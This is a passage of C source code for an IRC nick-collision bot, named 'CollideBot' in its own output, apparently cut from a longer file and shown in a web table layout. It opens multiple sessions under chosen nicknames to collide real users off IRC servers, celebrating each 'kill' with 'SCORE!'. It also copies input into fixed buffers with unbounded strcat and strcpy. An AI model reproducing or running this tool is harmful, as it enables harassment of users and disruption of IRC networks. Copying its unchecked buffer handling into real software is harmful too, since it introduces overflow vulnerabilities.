| buf[1]='O'; | |
| out(session[sessionum].sock,(char *)buf); | |
| out(session[sessionum].sock,"\r\n"); | |
| } | |
| else if(mycstrstr(buf,"already in use")) { | |
| printf("%s: Nickname already in use.\n",session[sessionum].nick); | |
| out(session[sessionum].sock,"QUIT\r\n"); | |
| } | |
| else if(mycstrstr(buf,"kill") && !session[sessionum].stat++) | |
| printf("%s: SCORE!\n",session[sessionum].nick); | |
| else if(mycstrstr(buf,"authoriz")) | |
| printf("%s: Not authorized to use server.\n",session[sessionum].nick); | |
| else if(mycstrstr(buf,"ghosts")) | |
| printf("%s: Banned from this IRC server.\n",session[sessionum].nick); | |
| } | |
| void parse(unsigned char *buf,int rl,int sessionum) { | |
| int x=0,len; | |
| strcat(session[sessionum].stack,buf); | |
| len=strlen(session[sessionum].stack); | |
| while(session[sessionum].stack[x]!=13 && session[sessionum].stack[x]!=10 && session[sessionum].stack[x]) | |
| x++; | |
| if(session[sessionum].stack[x]) { | |
| session[sessionum].stack[x]=0; | |
| parse2(session[sessionum].stack,x+1,sessionum); | |
| if(len>=(x+1)) { | |
| strcpy(buf,(char *)&session[sessionum].stack[x+1]); | |
| session[sessionum].stack[0]=0; | |
| parse(buf,len-(x+1),sessionum); | |
| } | |
| else | |
| session[sessionum].stack[0]=0; | |
| } | |
| } | |
| void process_servers(int secs) { | |
| fd_set rd,wr; | |
| int x,length,selectr=1; | |
| struct timeval timeout; | |
| while(selectr>0) { | |
| timeout.tv_usec=0; | |
| timeout.tv_sec=secs; | |
| errno=0; | |
| FD_ZERO(&rd); | |
| FD_ZERO(&wr); | |
| for(x=0;x<total_sessions;x++) | |
| if(session[x].sock) | |
| if(session[x].stat!=2) | |
| FD_SET(session[x].sock,&rd); | |
| else | |
| FD_SET(session[x].sock,&wr); | |
| selectr=select(getdtablesize(),&rd,&wr,NULL,(secs<0) ? NULL : (struct timeval *)&timeout); | |
| if(errno==EINTR) | |
| continue; | |
| for(x=0;x<total_sessions;x++) | |
| if(FD_ISSET(session[x].sock,&wr)) { | |
| session[x].stat=0; | |
| estab2(session[x].sock,session[x].server,session[x].nick); | |
| } | |
| else if(session[x].stat!=2 && FD_ISSET(session[x].sock,&rd)) { | |
| if(!(length=read(session[x].sock,buf,BUFSIZE-1))) { | |
| sessions--; | |
| cclosed(x); | |
| continue; | |
| } | |
| buf[length]=0; | |
| parse(buf,length,x); | |
| } | |
| } | |
| } | |
| void main(int argc,char *argv[]) { | |
| unsigned short int pid,x; | |
| unsigned long int ircserver=0; | |
| char *lastnick=0; | |
| if(argc<3) | |
| exit(0); | |
| kradprsn = argv[1]; | |
| /* if((pid=fork())) { | |
| printf("Process ID %d.\n",pid); | |
| exit(0); | |
| } */ | |
| sessions=total_sessions=0; | |
| srand(getpid()); | |
| signal(SIGHUP,(void *)quitprog); | |
| signal(SIGTERM,(void *)quitprog); | |
| signal(SIGABRT,(void *)quitprog); | |
| signal(SIGINT,(void *)quitprog); | |
| signal(SIGPIPE,(void *)sig_pipe); | |
| for(x=1;x<argc-1 && x<MAXSESSIONS;x++) { | |
| char *tempp,*default_server; | |
| unsigned long int tempserver; | |
| session[x].nick=(argv[x+1][0]=='@') ? (char *)&argv[x+1][1] : argv[x+1]; | |
| if((tempp=mycstrstr(argv[x+1],":"))) { | |
| *tempp=0; | |
| lastnick=session[x].nick; | |
| tempserver=ircserver; | |
| ircserver=resolver(tempp+1); | |
| if(ircserver) | |
| default_server=tempp+1; | |
| else | |
| ircserver=tempserver; | |
| } | |
| else if(mycstrstr(argv[x+1],".")) { | |
| if(!lastnick) { | |
| printf("Error: No default nickname to use for connection to %s!\n",argv[x+1]); | |
| continue; | |
| } | |
| tempserver=ircserver; | |
| ircserver=resolver(argv[x+1]); | |
| if(ircserver) | |
| default_server=argv[x+1]; | |
| else | |
| ircserver=tempserver; | |
| session[x].nick=lastnick; | |
| } | |
| lastnick=session[x].nick; | |
| if(ircserver) { | |
| if((session[x].sock=estab(ircserver,default_server,x))) { | |
| session[x].stack[0]=0; | |
| session[x].server=default_server; | |
| sessions++; | |
| } | |
| } | |
| else | |
| printf("%s: Error! No default server set.\n",session[x].nick); | |
| total_sessions=x+1; | |
| } | |
| if(sessions<1) { | |
| printf("CollideBot Exiting, no established sessions.\n"); | |
| exit(0); | |
| } | |
| signal(SIGALRM,(void *)quitprog); | |
| alarm(BOTTIMEOUT); | |
| while(1) | |
| ------------------------------------------------------------------------------ | |